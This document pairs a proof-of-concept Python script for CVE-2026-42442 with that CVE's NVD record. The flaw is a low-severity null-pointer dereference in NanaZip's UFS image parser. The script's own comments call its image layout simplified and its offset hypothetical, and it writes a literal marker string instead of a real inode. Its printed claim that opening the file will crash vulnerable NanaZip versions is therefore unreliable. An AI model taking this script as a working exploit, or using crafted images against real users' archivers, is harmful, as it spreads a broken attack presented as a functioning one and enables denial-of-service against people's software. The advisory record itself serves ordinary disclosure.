CVE-2026-42442

import struct import os # PoC for CVE-2026-42442 # Description: Generates a malformed UFS image structure to trigger the vulnerability. # The vulnerability occurs when the root inode (inode 2) is crafted as a symlink (IFLNK) # with a small size, causing a null-pointer dereference in NanaZip. def create_malformed_ufs(filename): with open(filename, 'wb') as f: # Write dummy data to simulate file start f.write(b'\x00' * 1024) # UFS Inode Mode: 0xA000 represents IFLNK (Symbolic Link) # Normal root inode is 0x4000 (IFDIR - Directory) mode = 0xA000 # Set di_size to a small value (e.g., 10 bytes). # This implies the symlink target is embedded in the inode, # resulting in a zero-length directory buffer when parsed as a directory. size = 10 # Construct a simplified malicious inode structure # Format: Mode (4 bytes), Size (8 bytes) - simplified for demonstration # Real UFS inode structure is more complex, but these are the key fields. inode_header = struct.pack('>I', mode) # Big-endian Mode inode_size = struct.pack('>Q', size) # Big-endian Size # Write the malformed inode data at a hypothetical offset # In a real exploit, one would patch a valid UFS image at the correct offset for Inode 2. f.write(b'MALICIOUS_INODE_2') f.write(inode_header) f.write(inode_size) print(f"[+] Created malformed UFS image: {filename}") print("[+] Root inode crafted as Symlink with small size.") print("[+] Opening this file in vulnerable NanaZip versions will trigger a crash.") if __name__ == "__main__": create_malformed_ufs("cve_2026_42442_poc.img")

{"cve": {"id": "CVE-2026-42442", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:41.393", "lastModified": "2026-05-13T16:26:29.697", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "NanaZip is an open source file archive. From 5.0.1252.0 to before 6.0.1698.0, a null-pointer dereference exists in the UFS/UFS2 filesystem image parser in NanaZip. The vulnerability is triggered when opening a crafted UFS image where the root inode (inode 2) is set to IFLNK (symlink) instead of IFDIR (directory). The parser unconditionally treats the root inode as a directory without checking its type, and when the symlink has an embedded target (small di_size), the directory data buffer is zero-length, causing a null-pointer dereference on the first read. This vulnerability is fixed in 6.0.1698.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://github.com/M2Team/NanaZip/security/advisories/GHSA-8r4x-fx3w-ph77", "source": "[email protected]"}]}}